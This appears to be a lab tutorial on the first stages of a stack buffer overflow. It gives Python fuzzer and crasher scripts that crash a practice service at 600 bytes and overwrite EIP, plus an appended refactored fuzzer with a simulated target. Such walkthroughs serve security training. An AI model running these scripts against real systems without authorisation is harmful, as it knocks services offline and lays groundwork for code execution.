# Crashing the Application

## Fuzzing the Application

This step can be skipped for applications where the buffer size that causes the crash is already known, as it is here.

### Fuzzer.py

```
#!/usr/bin/env python3

import socket, time, sys

ip = "windows.box"

port = 1337
timeout = 5          # seconds to wait for a reply before treating the target as crashed
prefix = "OVERFLOW10 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)   # read the banner
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.sendall(bytes(string, "latin-1"))
      s.recv(1024)   # a timeout or reset here means the target stopped responding
  except (socket.timeout, OSError):
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"   # grow the buffer by 100 bytes each round
  time.sleep(1)
```

### Fuzzing

```
python3 fuzzer.py
```

![](/files/-Mdc73K-bI19oZnpNySF)

![](/files/-Mdc75hr77UlmxOd4_VD)

The fuzzer tells us that the program crashed when **`600 bytes`** were sent as the buffer. We also notice that `EIP` has been overwritten with **`\x41`**.

## Crashing the Application

This step can be used to verify the value from the fuzzing process.

### Crasher.py

```
#!/usr/bin/python
import socket

try:
    print("\nSending evil buffer...")

    prefix = "OVERFLOW10 "
    buffer = prefix + "A" * 600   # the size reported by fuzzer.py

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer.encode("latin-1"))   # encode so this also runs under Python 3

    s.close()

    print("\nDone!")

except socket.error:
    print("\nCould not connect!")
```

### Crashing

```
python crasher.py
```

![](/files/-Mdc88DqFKwBpqjqqLxU)

![](/files/-Mdc8BLYsR6crFukWDd_)

Once `Crasher.py` is run, notice that the target application crashes and `EIP` is overwritten with **`\x41`**. This confirms that **`600 bytes`** is indeed the buffer size that causes the target application to crash.
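Added example (not part of this page or its scripts): the fuzz-then-verify loop above with the network transport factored out, so the same logic runs offline against a constructed stand-in for the service. It makes two things explicit that the page's scripts leave implicit: the number the fuzzer prints is the first step that failed, so the real threshold lies somewhere in the previous 100-byte window (returned here as the pair last good size / first crashing size), and a connection refused means the service was already dead from an earlier payload, in which case the reported size is not trustworthy and the target should be restarted before fuzzing again. The stand-in's `crash_at=583` is a constructed value, not a number from the page; `make_tcp_sender` reproduces the page's real connect, banner, send, reply sequence.

```python
#!/usr/bin/env python3
"""Fuzzing loop from fuzzer.py, restructured so it can run against a real
target or a simulated one. Added example, not the page's own code."""
import socket

PREFIX = "OVERFLOW10 "  # command prefix used by the page's scripts


def probe(sender, payload):
    """Send one payload and classify the outcome:
    'ok'    - the target answered,
    'crash' - it accepted the connection but stopped responding (timeout/reset),
    'down'  - it could not even be reached, i.e. it was already gone before
              this payload (killed by an earlier one or never restarted)."""
    try:
        sender(payload)
        return "ok"
    except ConnectionRefusedError:      # must precede OSError: it is a subclass
        return "down"
    except (socket.timeout, OSError):
        return "crash"


def find_crash_size(sender, prefix=PREFIX, step=100, limit=5000):
    """Grow the buffer by `step` bytes per round, exactly as fuzzer.py does.
    Returns (last_ok, first_failing_size, status) where sizes exclude the
    prefix, or None if nothing failed before `limit` bytes. The true crash
    threshold lies in (last_ok, first_failing_size]; a 'down' status means
    the size is meaningless and the target needs restarting."""
    last_ok = 0
    size = step
    while size <= limit:
        status = probe(sender, prefix + "A" * size)
        if status != "ok":
            return last_ok, size, status
        last_ok = size
        size += step
    return None


def make_tcp_sender(ip, port, timeout=5):
    """Real transport matching fuzzer.py: connect, read banner, send, read reply."""
    def sender(payload):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)
            s.sendall(payload.encode("latin-1"))
            s.recv(1024)
    return sender


def make_simulated_sender(prefix=PREFIX, crash_at=583):
    """Constructed stand-in for the vulnerable service. It 'crashes' on the
    first payload whose body reaches crash_at bytes and then refuses every
    later connection, the way a dead service would. 583 is an arbitrary
    constructed threshold, not a value from the page."""
    state = {"alive": True}

    def sender(payload):
        if not state["alive"]:
            raise ConnectionRefusedError("simulated: service no longer listening")
        if len(payload) - len(prefix) >= crash_at:
            state["alive"] = False
            raise ConnectionResetError("simulated: service crashed on this payload")
    return sender


if __name__ == "__main__":
    # Offline run against the stand-in; swap in make_tcp_sender("windows.box", 1337)
    # to drive the page's lab target instead.
    sim = make_simulated_sender()
    last_ok, first_crash, status = find_crash_size(sim)
    print("Fuzzing crashed at {} bytes (last good size {}, status {})".format(
        first_crash, last_ok, status))
    # Probing again without a restart shows why the service must be restarted:
    print("Next probe without restart:", probe(sim, PREFIX + "A" * 100))
```

Run as-is to see the stand-in report 600 bytes with 500 as the last good size, then report `down` on the next attempt; with the real sender substituted, the loop behaves like the page's `fuzzer.py` but tells you whether the failure was a crash on this payload or a service that was already gone.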
